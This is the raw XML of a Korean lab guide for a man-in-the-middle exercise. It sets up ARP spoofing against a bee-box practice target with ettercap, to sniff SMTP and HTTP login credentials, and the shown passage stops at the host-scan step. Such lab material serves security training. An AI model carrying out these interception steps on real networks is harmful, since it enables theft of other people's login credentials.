          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">이 시나리오는 </w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">스푸핑을 실시하여 </w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP </w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>정보를 스니핑하는 내용이다.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229DC487" w14:textId="19893421" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="3FA19B99" w14:textId="74D822DD" w:rsidR="0044016F" w:rsidRDefault="002D35C4" w:rsidP="002D35C4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4199"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F6FD9" w14:textId="46F2B3FE" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="67F00125" w14:textId="7D68DB87" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="3ABACA3F" w14:textId="2AEDA4A3" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="79D1BB35" w14:textId="7E07D0B8" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="0CDF156A" w14:textId="65452CA4" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="29CE8511" w14:textId="72D3AFD2" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="3E0CF28A" w14:textId="11C17DAA" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="46FE9AF4" w14:textId="308B6553" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="6EBADD18" w14:textId="11C0C78D" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="2BB41A01" w14:textId="37567187" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="0A4E27BB" w14:textId="7356E2AF" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="674344CA" w14:textId="1AB2E4E8" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893"/>
    <w:p w14:paraId="5C0464DB" w14:textId="77777777" w:rsidR="0044016F" w:rsidRDefault="0044016F" w:rsidP="00AE7893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AE7893" w14:paraId="120CDB6F" w14:textId="77777777" w:rsidTr="00A8495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6908CF7D" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00BE7966" w:rsidRDefault="00AE7893" w:rsidP="00A849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0C7CAFAA" wp14:editId="266BD31E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96EE8" id="직사각형 1" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.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AE7893" w14:paraId="6196B758" w14:textId="77777777" w:rsidTr="00A8495D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4AFB48" w14:textId="437CA7C2" w:rsidR="00AE7893" w:rsidRPr="0050741D" w:rsidRDefault="00AE7893" w:rsidP="00A8495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lastRenderedPageBreak/>
              <w:br w:type="page"/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공격과정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AE7893" w14:paraId="42C8D86F" w14:textId="77777777" w:rsidTr="00A8495D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6E04A207" w14:textId="5AA57EF2" w:rsidR="00AE7893" w:rsidRPr="00BE7966" w:rsidRDefault="00AE7893" w:rsidP="00A8495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118EEEE2" wp14:editId="24E5D686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C1AC5" id="직사각형 2" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-3pt;margin-top:-53.15pt;width:533.25pt;height:766.5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AE7893" w14:paraId="34E4BAB9" w14:textId="77777777" w:rsidTr="00A8495D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E23F7C3" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00B67587" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28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4000D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>실습환경</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE7893" w14:paraId="5514D0B1" w14:textId="77777777" w:rsidTr="00A8495D">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45DC1E9A" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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483"/>
              <w:gridCol w:w="3483"/>
              <w:gridCol w:w="3484"/>
            </w:tblGrid>
            <w:tr w:rsidR="00AE7893" w14:paraId="496E07C3" w14:textId="77777777" w:rsidTr="00A849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5" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="288EDA28" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495D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</w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="0B53ECB4" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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OS</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2DAC6366" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00AE7893" w14:paraId="42B6FE5C" w14:textId="77777777" w:rsidTr="00A849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C972A" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495D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공격 호스트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FD922" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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Kali Linux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9D401" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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192.168.0.1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49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/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00AE7893" w14:paraId="35EE15D6" w14:textId="77777777" w:rsidTr="00A849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8DAA7" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495D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타겟 호스트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8FA3A" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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Ubuntu(Bee-box)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480CE" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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192.168.0.146/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="09C872A9" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00A8495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69E36E8C" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="003C4ACB" w:rsidRDefault="00AE7893" w:rsidP="00A8495D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AE7893" w14:paraId="2D5BF1AC" w14:textId="77777777" w:rsidTr="00A8495D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1A96FC5B" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="003C4ACB" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:ind w:leftChars="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bookmarkStart w:id="2" w:name="_Hlk61549500"/>
            <w:r w:rsidRPr="003C4ACB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H</w:t>
            </w:r>
            <w:r w:rsidRPr="003C4ACB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TTP </w:t>
            </w:r>
            <w:r w:rsidRPr="003C4ACB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공격과정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="3B531951" w14:textId="1E8B2209" w:rsidR="00AE7893" w:rsidRPr="00A61C03" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61C03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>보안 레벨 선택 및 시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFF1D5A" w14:textId="0080F9D5" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Main-in-the-Middle Attack (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15F93C" w14:textId="1AA817AC" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">low </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, set 클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907503B" w14:textId="277842E3" w:rsidR="00AE7893" w:rsidRPr="003C4ACB" w:rsidRDefault="0016435C" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="1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BAAC51F" wp14:editId="3F30797D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4356100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1055306</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1582671" cy="349784"/>
                <wp:effectExtent l="19050" t="19050" r="17780" b="12700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71" cy="3497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4B0AB" id="직사각형 106" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:343pt;margin-top:83.1pt;width:124.6pt;height:27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D30CED9" wp14:editId="3F7CC282">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4337637</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>811182</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1582671" cy="180735"/>
                <wp:effectExtent l="19050" t="19050" r="17780" b="10160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71" cy="180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10F51" id="직사각형 105" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:341.55pt;margin-top:63.85pt;width:124.6pt;height:14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F72240" wp14:editId="4606E11A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1758950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>365189</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1775011" cy="196103"/>
                <wp:effectExtent l="19050" t="19050" r="15875" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="96" name="직사각형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011" cy="1961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46D07" id="직사각형 96" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:138.5pt;margin-top:28.75pt;width:139.75pt;height:15.4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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AE7893" w:rsidRPr="003C4ACB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4509CFDF" wp14:editId="2AB230C9">
            <wp:extent cx="5760000" cy="1586742"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1397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86742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9DD4AE" w14:textId="7841D8DF" w:rsidR="00AE7893" w:rsidRDefault="000C0D36" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00AE7893">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">TTP </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">로그인 폼 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4EA9C" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="003C4ACB" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="1120"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4ACB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39BAD8FA" wp14:editId="6CC440F2">
            <wp:extent cx="5760000" cy="2131207"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2159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31207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D91C84" w14:textId="4DDC2A7F" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">로그인 정보 스니핑 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27D67D" w14:textId="76126C12" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>툴 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625C276A" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00976082" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4ACB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3C4ACB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># ettercap –G </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b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또는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">ali linux] </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [프로그램] </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [sniffing &amp; Spoofing] </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[ettercap]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0460FB95" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="003C4ACB" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1586"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A03017" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2644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87AEF3" wp14:editId="164F7F37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>833675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>60896</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1865871" cy="210065"/>
                <wp:effectExtent l="19050" t="19050" r="2032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871" cy="210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3B56C" id="직사각형 3" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:65.65pt;margin-top:4.8pt;width:146.9pt;height:16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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"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2D019C8" wp14:editId="0479B4F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772275" cy="10081452"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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00814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B3E6D" id="직사각형 8" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:793.8pt;z-index:-251571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  <w:r w:rsidRPr="00F26441">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C215BFA" wp14:editId="6E3A9D4A">
            <wp:extent cx="5760000" cy="605538"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2349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05538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61953B" w14:textId="3185CA22" w:rsidR="00AE7893" w:rsidRDefault="000C0D36" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[Sniff] – [Unified Sniffing] – [eth0] </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, 확인 </w:t>
      </w:r>
      <w:r w:rsidR="00AE7893">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6DF15" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRPr="00976082" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:ind w:firstLineChars="700" w:firstLine="1400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2644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9DECB4" wp14:editId="288E7AED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5464175</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>31750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="236220" cy="252730"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="1397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27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F1FD9" id="직사각형 4" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:430.25pt;margin-top:2.5pt;width:18.6pt;height:1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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F26441">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D0E9F26" wp14:editId="4B0DBA51">
            <wp:extent cx="5760000" cy="3239146"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="184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1564"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="3239146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C421D" w14:textId="6E5A295E" w:rsidR="000C0D36" w:rsidRPr="000C0D36" w:rsidRDefault="000C0D36" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>호스트 스캔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171154B" w14:textId="075C57DD" w:rsidR="000C0D36" w:rsidRPr="000C0D36" w:rsidRDefault="000C0D36" w:rsidP="000C0D36">
      <w:pPr>
        <w:ind w:left="876" w:firstLine="644"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[Host]-[Scan for hosts]-[Host list]</w:t>
      </w:r>
    </w:p>
